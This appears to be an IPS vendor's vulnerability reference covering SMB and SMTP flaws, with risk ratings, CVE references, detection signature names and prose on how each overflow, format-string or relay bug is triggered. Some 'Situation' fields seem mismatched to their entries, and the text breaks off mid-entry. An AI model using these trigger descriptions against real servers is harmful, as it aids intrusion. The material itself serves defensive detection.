
MS02-045
http://technet.microsoft.com/security/bulletin/MS02-045

SMB-Nonzero-Reserved-Value-In-AndX-Header

About this vulnerability:	An unusual value was found in an SMB message
Risk:	Low
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An unusual value was found in an SMB message
Situation:	SMB-TCP_CHS-Nonzero-Reserved-Value-In-AndX-Header

SMB-Pool-Overflow-MS10-054

About this vulnerability:

A memory corruption vulnerability in Samba

Risk:

Critical

First detected in:

sgpkg-ips-328-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a memory corruption vulnerability in SMB Server. A remote unauthenticated attacker can exploit this vulnerability by specifying a malicious request to compromise the vulnerable system.

Situation:

SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054
SMB-TCP_CHS-SMB-Server-Pool-Overflow-MS10-054-2

References:

CVE-2010-2550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2550

MS10-054
http://technet.microsoft.com/security/bulletin/MS10-054

SMB-Samba-Domain-Controller-Service-Crafted-Mailslot-Name-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Samba mailslot name handling

Risk:

High

First detected in:

sgpkg-ips-135-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Solaris; Mac OS X

Software:

Samba

Type:

Buffer Overflow

Description:

The implementation of Domain Controller protocols in Samba suffers from a buffer overflow vulnerability in the handling of certain mailslot requests. A mailslot SAM LOGON message with a long mailslot name can be used to overflow a buffer and to possibly execute arbitrary code. This vulnerability can be exploited by unauthenticated remote attackers over UDP.

Situation:

Generic_UDP-Samba-Domain-Controller-Crafted-Mailslot-Name-Buffer-Overflow

References:

CVE-2007-6015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6015

BID-26791
http://www.securityfocus.com/bid/26791

SMB-Samba-Dot-Slash-Combination-Directory-Traversal

About this vulnerability:

Samba directory traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Samba

Type:

Malfunction

Description:

A design flaw in the sanitation of filenames causes Samba to allow access to files outside the share path. To exploit the vulnerability, the attacker needs an account that has the rights to access the wanted files.

Situation:

SMB-TCP_CHS-SMB-Samba-Dot-Slash-Combination-Directory-Traversal

References:

CVE-2004-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815

BID-11281
http://www.securityfocus.com/bid/11281

SMB-Transaction-Command-Nonzero-Reserved-Field

About this vulnerability:	An unusual value in an SMB command was detected
Risk:	Moderate
First detected in:	sgpkg-ips-426-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	An unusual value in an SMB command was detected
Situation:	SMB-TCP_CHS-Transaction-Command-Nonzero-Reserved-Field

SMB-Unimplemented-Command-Com-Close-And-Tree-Disc

About this vulnerability:	An unimplemented SMB command was detected
Risk:	Moderate
First detected in:	sgpkg-ips-426-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	An unimplemented SMB command was detected
Situation:	SMB-TCP_CHS-Unimplemented-Command-Com-Close-And-Tree-Disc

SMB-Unimplemented-Command-Com-New-File-Size

About this vulnerability:	An unimplemented SMB command was detected
Risk:	Moderate
First detected in:	sgpkg-ips-429-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	An SMB command which is not implemented by any server was detected
Situation:	SMB-TCP_CHS-Unimplemented-Command-Com-New-File-Size

SMB-Windows-Server-Message-Block-Vulnerability

About this vulnerability:

Windows SMB vulnerability known as the "Server Message Block Vulnerability"

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Certain versions of Microsoft Windows suffer from the Server Message Block Vulnerability, a vulnerability in the SMB implementation. A buffer overflow occurs when handling crafted SMB headers, allowing remote attackers to cause a denial of service and possibly execute arbitrary code.

Situation:

SMB-TCP_CHS-Windows-Server-Message-Block-Vulnerability

References:

CVE-2005-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1206

MS05-027
http://technet.microsoft.com/security/bulletin/MS05-027

SMB2-Dialect-Requested

About this vulnerability:	An SMB client requested the SMB2 dialect
Risk:	Moderate
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An unusual value in an SMB command was detected
Situation:	SMB-TCP_CHS-SMB2-Dialect-Requested

SMB_CA-BrightStor-Discovery-Service-Mailslot-Buffer-Overflow-Vulnerability

About this vulnerability:

Buffer overflow vulnerability in Mailslot handling of CA BrightStor Discovery Service

Risk:

Moderate

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor Discovery Service suffers from a buffer overflow vulnerability in the handling of long Mailslot messages. A successful attack allows remote attackers to execute arbitrary code on the vulnerable host.

Situation:

SMB-TCP_CHS-CA-BrightStor-Discovery-Service-CheyenneDS-Mailslot-Traffic-Detected

References:

CVE-2006-5142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5142

BID-20364
http://www.securityfocus.com/bid/20364

SMTP-1st-Up-Multi-Command-Crash

About this vulnerability:	SMTP 1st Up Multi Command Crash
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	1st Up Mail Server
Type:	Malfunction
Description:	Mail server will crash if the client sends multiple commands in single line. Example: "MAIL HELP"
Situation:	SMTP_Multi-Command-Crash

SMTP-Analogx-Helo-BOF

About this vulnerability:

SMTP Analogx Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AnalogX Proxy

Type:

Buffer Overflow

Description:

AnalogX proxy server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 370 bytes or more triggers the overflow.

Situation:

References:

CVE-2000-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0656

BID-1504
http://www.securityfocus.com/bid/1504

SMTP-Apple-Appleshare-Helo-BOF

About this vulnerability:

SMTP Apple Appleshare Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS 8

Software:

AppleShare Mail Server

Type:

Buffer Overflow

Description:

AppleShare Mail Server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 500 bytes triggers the overflow.

Situation:

References:

CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284

BID-61
http://www.securityfocus.com/bid/61

SMTP-Apple-Stalker-Helo-BOF

About this vulnerability:

SMTP Apple Stalker Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS

Software:

Stalker Internet Mail Server version

Type:

Buffer Overflow

Description:

Stalker Internet Mail Server contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 579 bytes triggers the overflow.

Situation:

E-Mail_HCS-BitDefender-AntiVirus-Logging-Function-Format-String

References:

CVE-1999-1504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1504

BID-62
http://www.securityfocus.com/bid/62

SMTP-BitDefender-AntiVirus-Logging-Function-Format-String

About this vulnerability:

BitDefender AntiVirus Logging Function Format String Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-61-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BitDefender

Type:

Format String

Description:

The Softwin BitDefender AntiVirus product has a format string vulnerability. The vulnerability can be exploited by delivering a file with a filename containing format string identifiers to a target system that has the vulnerable product installed. A successful exploitation of this vulnerability can lead to arbitrary code excecution or terminate the current virus scanning process without any log information about the unexpected termination.

Situation:

References:

CVE-2005-3154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3154

BID-14968
http://www.securityfocus.com/bid/14968

OSVDB-19840
http://www.osvdb.org/19840

SMTP-Citadel-Helo-BOF

About this vulnerability:

SMTP Citadel Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Citadel

Type:

Buffer Overflow

Description:

Citadel/UX contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.

Situation:

References:

CVE-2002-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0432

BID-4263
http://www.securityfocus.com/bid/4263

SMTP-Cmail-Helo-BOF

About this vulnerability:

SMTP Cmail Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computalynx CMail POP3 mail server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.

Situation:

References:

CVE-2001-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0742

SMTP-Csm-Helo-BOF

About this vulnerability:

SMTP Csm Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

CSM mail server

Type:

Buffer Overflow

Description:

CSM Mail Server for Windows 95/NT has buffer overflow in HELO argument processing. This vulnerability can be exploited to cause a denial of service situation or to possible allow arbitrary code.

Situation:

SMTP_Dsmtp-Xtellmail-Format-String-System-Compromise

References:

CVE-2000-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0042

BID-895
http://www.securityfocus.com/bid/895

SMTP-Debug-Backdoor

About this vulnerability:

SMTP Debug Backdoor

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Backdoor

Description:

Sendmail contain a debug command, DEBUG, which if enabled allows remote attackers to execute commands as root.

Situation:

SMTP_Debug-Detect

References:

CVE-1999-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145

SMTP-Dsmtp-Xtellmail-Format-String-System-Compromise

About this vulnerability:

dSMTP xtellmail command format string system compromise

Risk:

High

First detected in:

sgpkg-ips-26-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

dSMTP

Type:

Format String

Description:

dSMTP has a format strings vulnerability in the handling of xtellmail commands. Unauthenticated remote attackers can execute arbitrary commands on a server running dSMTP 3.1a or 3.1b by sending a xtellmail command followed by format string specifiers and shellcode.

Situation:

References:

CVE-2005-1478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1478

BID-13505
http://www.securityfocus.com/bid/13505

SMTP-Eserv-Helo-BOF

About this vulnerability:

SMTP Eserv Helo BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Eserv

Type:

Buffer Overflow

Description:

Eserv contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.

Situation:

References:

CVE-2000-0907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0907

SMTP-Exchange-Helo-BOF

About this vulnerability:

SMTP Exchange Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Buffer Overflow

Description:

Exchange SMTP Server contains a buffer overflow vulnerability in HELO argument processing.

Situation:

SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-2
SMTP_Exchange-Server-X-LINK2STATE-Chunk-System-Compromise-3

References:

CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284

SMTP-Exchange-Mail-Relay

About this vulnerability:

SMTP Mail Relay

Risk:

Low

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 5.5

Type:

Malfunction

Description:

Microsoft Exchange 5.5 allows a remote spammer to relay email using encapsulated SMTP addresses, even if the anti-relaying features are enabled.

Situation:

SMTP_Relay

References:

CVE-1999-0682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0682

BID-567
http://www.securityfocus.com/bid/567

MS99-027
http://technet.microsoft.com/security/bulletin/MS99-027

SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise

About this vulnerability:

Exchange Server 2000 and 2003 X-LINK2STATE buffer overflow

Risk:

High

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000; Exchange Server 2003

Type:

Buffer Overflow

Description:

Microsoft Exchange Server 2000 and 2003 suffer from a buffer overflow vulnerability, which allows remote attackers to execute arbitrary code by connecting to the SMTP port and issuing specially-crafted commands. The vulnerability can be exploited by sending large chunks with the X-LINK2STATE verb.

Situation:

References:

CVE-2005-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0560

BID-13118
http://www.securityfocus.com/bid/13118

OSVDB-15467
http://www.osvdb.org/15467

MS05-021
http://technet.microsoft.com/security/bulletin/MS05-021

SMTP-Extremail-Flow-Format-Strings-Vulnerability

About this vulnerability:

Format Strings vulnerability in flog function of eXtremail

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

eXtremail

Type:

Format String

Description:

EXtremail SMTP server software has a format strings vulnerability in its flog function. This vulnerability can be exploited easily since working exploits exists in the wild.

Situation:

SMTP_Format-String-Specifiers-In-Argument-To-MAIL

References:

CVE-2001-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1078

BID-2908
http://www.securityfocus.com/bid/2908

SMTP-FTGatePro-Mail-Server-RCPT-To-Buffer-Overflow

About this vulnerability:

FTGatePro Mail Server RCPT To Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Floosietek FTGatePro

Type:

Buffer Overflow

Description:

Buffer overflow in Floosietek FTGate Pro Mail Server (FTGatePro) 1.22 allow remote attackers to execute arbitrary code via long RCPT To command.

Situation:

E-Mail_BS-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow

References:

CVE-2003-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0263

BID-7508
http://www.securityfocus.com/bid/7508

SMTP-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability with UUE files in the attachment viewer of IBM Lotus Notes

Risk:

Moderate

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

The attachment viewer of IBM Lotus Notes has a buffer overflow vulnerability in the handling of UU-Encoded files. With a long file name attribute in the UUE-file header line a remote attacker is able to overflow a fixed size stack buffer and possibly divert the flow of the process to an arbitrary code block.

Situation:

References:

CVE-2005-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2618

BID-16576
http://www.securityfocus.com/bid/16576

OSVDB-23068
http://www.osvdb.org/23068

OSVDB-23067
http://www.osvdb.org/23067

OSVDB-23066
http://www.osvdb.org/23066

OSVDB-23065
http://www.osvdb.org/23065

OSVDB-23064
http://www.osvdb.org/23064

SMTP-Imate-Webmail-Helo-BOF

About this vulnerability:

SMTP Imate Webmail Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Concatus IMate Web Mail Server

Type:

Buffer Overflow

Description:

Concatus IMate Web Mail Server version 2.5 has buffer overflow vulnerability in its HELO argument processing. By sending a HELO command with over 1119 chars as argument, the mail server software should crash.

Situation:

SMTP_Format-String-Specifiers-In-Argument-To-EHLO
SMTP_Format-String-Specifiers-In-Argument-To-MAIL
SMTP_Format-String-Specifiers-In-Argument-To-Expn
SMTP_Format-String-Specifiers-In-Argument-To-RCPT

References:

CVE-2000-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0507

BID-1286
http://www.securityfocus.com/bid/1286

SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability

About this vulnerability:

Ipswitch Collaboration Suite format string vulnerability in multiple SMTP commands

Risk:

High

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ipswitch Collaboration Suite; IMail

Type:

Format String

Description:

Ipswitch SMTP servers suffer from a format string vulnerability in the handling of clients SMTP commands. Format string specifiers passed as arguments to the commands EHLO, MAIL, RCPT and EXPN allow attackers to manipulate heap and stack memory, possibly leading to arbitary code execution. No authentication is required to exploit this vulnerability.

Situation:

References:

CVE-2005-2931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2931

BID-15752
http://www.securityfocus.com/bid/15752

SMTP-Ipswitch-Helo-BOF

About this vulnerability:

SMTP Ipswitch Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail; Exchange Server; MDaemon

Type:

Buffer Overflow

Description:

Ipswitch SMTP Server contains a buffer overflow vulnerability in HELO argument processing.

Situation:

SMTP_Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow

References:

CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284

SMTP-Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Ipswitch IMail Server

Risk:

High

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

Ipswitch IMail Server has a stack-based buffer overflow vulnerability. By successfully exploiting this vulnerability a remote attacker can cause a DoS or compromise the vulnerable system.

Situation:

References:

CVE-2006-4379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379

BID-19885
http://www.securityfocus.com/bid/19885

OSVDB-28576
http://www.osvdb.org/28576

SMTP-Lotus-Notes-RCPT-To-Policy-BOF

About this vulnerability:

Buffer Overflow in Lotus Notes SMTP Server RCPT TO argument processing

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

Buffer overflow in Lotus Notes mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server. The buffer overflow occurs only if mail forwarding domain policy is enabled.

Situation:

SMTP_MailEnable-SMTP-Authentication-Buffer-Overflow

References:

CVE-2001-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0260

BID-2283
http://www.securityfocus.com/bid/2283

OSVDB-3321
http://www.osvdb.org/3321

SMTP-Mail-Relay

About this vulnerability:

SMTP Mail Relay

Risk:

Low

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Misconfiguration

Description:

A mail server is explicitly configured to allow SMTP mail relay, which allows abuse by spammers.

Situation:

SMTP_Relay

References:

CVE-1999-0512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0512

SMTP-MailEnable-SMTP-Authentication-Buffer-Overflow

About this vulnerability:

MailEnable buffer overflow vulnerability in an AUTH command

Risk:

High

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

MailEnable has a buffer overflow vulnerability in the handling of the AUTH command. A remote attacker can exploit this vulnerability by sending an SMTP AUTH command with an excessively long username argument which leads to a stack buffer overrun causing a DoS or execution of arbitrary commands on the server.

Situation:

References:

CVE-2005-1781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1781

BID-13772
http://www.securityfocus.com/bid/13772

OSVDB-16851
http://www.osvdb.org/16851

SMTP-MailEnable-SMTP-Helo-Command-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in MailEnable

Risk:

Moderate

First detected in:

sgpkg-ips-71-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

MailEnable has a denial of service vulnerability in the handling of the HELO command. A remote attacker can exploit this vulnerability by sending an SMTP HELO command with a crafted domain argument which leads to a denial of service condition.

Situation:

SMTP_MailEnable-SMTP-Helo-Command-Denial-Of-Service

References:

CVE-2006-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3277

BID-18630
http://www.securityfocus.com/bid/18630

OSVDB-26791
http://www.osvdb.org/26791

SMTP-Mailman-Bad-Date-Data-Denial-Of-Service

About this vulnerability:

Mailman bad date data denial of service vulnerability

Risk:

Low

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mailman

Type:

Malfunction

Description:

Mailman versions 2.1.4 - 2.1.6 suffer from a denial of service vulnerability while processing email messages with a bad date field. A malformed message sent to a mailing list handled by Mailman can stop further processing of the list, allowing remote attackers to break mailing lists handled by Mailman by sending a malicious message.

Situation:

E-Mail_HCS-Malformed-Date-Header-Field

References:

CVE-2005-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4153

BID-16248
http://www.securityfocus.com/bid/16248

OSVDB-21723
http://www.osvdb.org/21723

SMTP-Mailman-Utf8-Encoded-Attachment-Filename-Denial-Of-Service

About this vulnerability:

Mailman does not handle correctly attachments with UTF-8 encoded filenames

Risk:

Low

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mailman

Type:

Malfunction

Description:

Mailman versions 2.1.5 - 2.1.8 do not handle correctly e-mail attachments with utf-8 encoded filenames. If Mailman encounters such attachments while processing a mailing list, the list will stop working. This allows remote attackers to execute denial of service attacks against mailing lists simply by sending crafted e-mail messages to them.

Situation:

E-Mail_HCS-Malformed-Utf8-Encoded-Attachment-Filename

References:

CVE-2005-3573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573

BID-15408
http://www.securityfocus.com/bid/15408

OSVDB-20819
http://www.osvdb.org/20819

SMTP-Mailmax-BOF

About this vulnerability:

SMTP Mailmax BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mail-Max

Type:

Buffer Overflow

Description:

Mail-Max contains a buffer overflow in Mail-Max SMTP software allows remote attacker to gain administrator priviledges.

Situation:

SMTP_Win-ShellCode-1

References:

CVE-1999-0404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404

SMTP-McAfee-WebShield-SMTP-Bounce-Message-Format-String

About this vulnerability:

McAfee WebShield SMTP bounce message format string vulnerability

Risk:

High

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee WebShield SMTP

Type:

Format String

Description:

McAfee WebShield SMTP version 4.5 MR1a and prior has a format string vulnerability. A remote attacker can exploit this vulnerability by sending an SMTP message with a crafted destination address containing format string specifiers in the RCPT TO command to the target server, which can lead to a DoS or execution of arbitrary commands on the server.

Situation:

SMTP_McAfee-WebShield-SMTP-Bounce-Message-Format-String

References:

CVE-2006-0559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0559

BID-16742
http://www.securityfocus.com/bid/16742

OSVDB-24366
http://www.osvdb.org/24366

SMTP-MDaemon-Content-Filter-Directory-Traversal

About this vulnerability:

MDaemon Content Filter directory traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Directory Traversal

Description:

The Alt-N MDaemon email server software has a directory traversal vulnerability. The exploitation of this vulnerability is possible if the quarantine option of the vulnerable product is enabled on the target system. The vulnerability can be exploited by delivering an email message with a malicious attachment of which filename contains directory traversal sequences to a target system. A successful exploitation causes the malicious attachment file to be placed in an arbitrary location on the target system, which may lead to arbitrary code excecution later, for example during the next startup.

Situation:

E-Mail_HCS-MDaemon-Content-Filter-Directory-Traversal

References:

BID-14400
http://www.securityfocus.com/bid/14400

OSVDB-18348
http://www.osvdb.org/18348

SMTP-MDaemon-Helo-BOF

About this vulnerability:

SMTP MDaemon Helo BOF

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MDaemon

Type:

Buffer Overflow

Description:

MDaemon SMTP Server contains a buffer overflow vulnerability in HELO argument processing.

Situation:

SMTP_Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow

References:

CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284

SMTP-Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Mercury Mail Transport System

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mercury Mail Transport System

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Mercury Mail Transport System. A remote attacker can exploit this vulnerability by sending a crafted CRAM-MD5 response string to a vulnerable SMTP server to compromise the system.

Situation:

References:

CVE-2007-4440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440

BID-25357
http://www.securityfocus.com/bid/25357

SMTP-Microsoft-Collaboration-Data-Objects-BOF

About this vulnerability:

Buffer overflow vulnerability in Microsoft Collaboration Data Objects (CDO). MS05-048

Risk:

Critical

First detected in:

sgpkg-ips-42-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Collaboration Data Objects

Type:

Buffer Overflow

Description:

Microsoft Collaboration Data Objects (CDO) suffer from a buffer overflow in the handling of mail message headers. Message headers are copied into a fixed size buffer without sufficient boundary validation, leading to a buffer overflow with sufficiently long headers. The vulnerability can be exploited by remote attackers to execute arbitrary code with SYSTEM privileges on the vulnerable system.

Situation:

E-Mail_HCS-Microsoft-Collaboration-Data-Objects-BOF

References:

CVE-2005-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1987

BID-15067
http://www.securityfocus.com/bid/15067

OSVDB-19905
http://www.osvdb.org/19905

MS05-048
http://technet.microsoft.com/security/bulletin/MS05-048

SMTP-Msgcore-DoS

About this vulnerability:

SMTP Msgcore DoS

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 95; Windows NT

Software:

Nosque Workshop MsgCore

Type:

Malfunction

Description:

Multiple sequences of "HELO/ MAIL FROM/ RCPT TO / DATA" commands in single connection causes memory leak that will lead into a denial of service condition.

Situation:

References:

CVE-2000-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0075

BID-895
http://www.securityfocus.com/bid/895

SMTP-Netscape-Messaging-Server-RCPT-To-DoS

About this vulnerability:

Netscape Messaging Server Denial of Service via multiple RCPT to commands

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netscape Messaging Server

Type:

Malfunction

Description:

Large amounts of rcpt to commands with long argument cuases resource starvation and thus lead into a denial of service situation.

Situation:

References:

CVE-1999-1532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1532

BID-748
http://www.securityfocus.com/bid/748

SMTP-Notes-Relay

About this vulnerability:

SMTP Notes Relay

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Misconfiguration

Description:

Some versions of Notes SMTP server have a bug that allows mail to be relayed even relaying should be denied. This can be used in spamming purposes.

Situation:

SMTP_Lotus-Notes-Relay

References:

CVE-2001-1445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1445

SMTP-Novell-Groupwise-RCPT-To-BOF

About this vulnerability:

GroupWise SMTP Server RCPT TO buffer overflow

Risk:

High

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

Buffer overflow in Novell GroupWise 6.0.1 mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server.

Situation:

SMTP_Mail-From-Pipe
SMTP_Mail-RCPT-To-Pipe

References:

CVE-2002-1088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1088

BID-5313
http://www.securityfocus.com/bid/5313

SMTP-Pipe-Sendmail-Attack

About this vulnerability:

SMTP Pipe Sendmail vulnerability

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sendmail

Type:

Metacharacter

Description:

Very old versions of sendmail contain a vulnerability where clever use of pipe in MAIL from: or RCPT to: command cause mail contents to be executed in shell in the sendmail server. The impact is remote root.

Situation:

References:

CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203

SMTP-Qk-SMTP-Server-RCPT-To-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in QK SMTP Server

Risk:

High

First detected in:

